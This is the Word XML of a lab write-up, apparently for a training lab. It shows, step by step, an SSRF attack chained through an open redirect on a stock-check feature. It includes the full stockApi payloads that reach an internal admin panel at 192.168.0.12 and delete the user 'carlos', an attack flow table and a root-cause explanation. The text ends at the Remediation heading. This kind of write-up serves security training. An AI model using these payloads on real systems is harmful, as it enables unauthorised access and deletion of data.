    <w:p w14:paraId="2FF093AA" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B5DBF2B" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5276"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4. Exploitation — Step by Step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167BA95E" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED088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D0889" w14:paraId="7A1384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60" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="211D3F56" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Step 1: Intercept the Stock Check Request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="158601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EFE"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="59E0861E" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Visit a product page, click 'Check stock', and intercept the POST request in Burp Suite. Send to Repeater.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51055A9C" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED088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D0889" w14:paraId="0DC1F85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A5276"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5571E744" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Step 2: Confirm Direct SSRF is Blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="2F4843F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DFEFE"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="65600262" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Change </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>stockApi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> to http://192.168.0.12:8080/admin and observe the rejection. The filter only permits requests to the local application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="308006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026436D2" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="117A65"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Payload</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997D2D4" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>stockApi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>=http://192.168.0.12:8080/admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A7BCF8A" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED088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D0889" w14:paraId="3264ABC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A5276"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3AD5AD43" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Step 3: Verify the Open Redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="621A155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DFEFE"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5B1F7D63" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Intercept a 'Next product' navigation. Confirm that modifying the path parameter to an absolute URL (e.g. http://example.com) results in a 302 redirect to that URL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="26243E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1DB22E76" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="117A65"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Payload</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57AD15A5" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>GET /product/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>nextProduct?path</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>=http://example.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5776BDE7" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED088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7652"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED0889" w14:paraId="61D24D4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A5276"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="01602E06" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Step 4: Chain Open Redirect into SSRF — Access Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="564EEEB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DFEFE"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5BEAB5D7" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>stockApi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> to the open redirect URL, with the internal admin interface as the redirect target. The stock checker fetches the allowed same-origin path, then follows the 302 to the internal IP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="1792A5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2D29CF9C" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="117A65"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Payload</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80E4C52" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FE6022A" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED088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
        <w:gridCol w:w="10274"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED0889" w14:paraId="73B6BB4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A5276"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="65EDED55" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Step 5: Delete User </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>carlos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="18A30F8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DFEFE"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="443AA399" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Observe the admin panel is returned. Modify the path to trigger the delete action for the target user. The request follows the redirect chain and deletes </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>carlos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> — lab solved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="5B1C0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4296A96C" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="117A65"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Payload</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8EE5ABE" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C834900" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="339465A9" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDC3C7"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0CC402" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C862BD" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5276"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>5. Attack Flow Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D809041" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED088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7"/>
        <w:gridCol w:w="10274"/>
      </w:tblGrid>
      <w:tr w:rsidR="00ED0889" w14:paraId="1C7249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82ACBCE" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Actor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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CD96E88" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="487EFA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72C60B" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker</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24813E" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Sends stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="59BCF8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4A6CE994" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stock Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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4F49B54C" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Receives relative URL — domain restriction passes (same app)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="69AE2D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1A87CE4" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>App Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="71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7CC0A25" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Issues GET /product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="291FF0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5A02E5B9" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nextProduct</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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3C33C52C" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Returns HTTP 302 Location: http://192.168.0.12:8080/admin/delete?username=carlos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="2564CF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494A8AA8" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stock Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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4BB622E0" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Follows 302 redirect to internal IP — </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>carlos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> deleted!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27672FB6" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C9E2FBC" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDC3C7"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9A183D" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A0A6F1" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5276"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>6. Why This Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3129AB" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78184ED9" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The root cause is that the origin-based restriction is applied to the initial URL only — not to the final destination after redirect resolution. Two distinct weaknesses combine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5795DC58" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B3307CB" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>The stock checker trusts any relative URL pointing to the local application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBEB8D5" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nextProduct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> endpoint reflects the path parameter into a Location header without any destination validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C5A529" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>The stock checker's HTTP client follows 302 redirects automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635DF14E" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>No secondary validation is applied to where the redirect leads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FF2E41" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499E4330" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>The attack is entirely relative-URL-based from the filter's perspective. The filter sees '/product/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nextProduct?path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=...' and passes it. By the time the destination is known, the filter has already approved the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57845E87" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C2B55EF" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDC3C7"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758C7315" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2827F4DA" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5276"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>7. Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE90B5D" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A65C327" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Burp Suite (Intercept, Repeater)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFC9D3D" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Web browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4229007B" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Manual URL crafting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0447ED" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51480F63" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDC3C7"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54831CF5" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44FAD498" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5276"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>8. Remediation</w:t>
      </w:r>
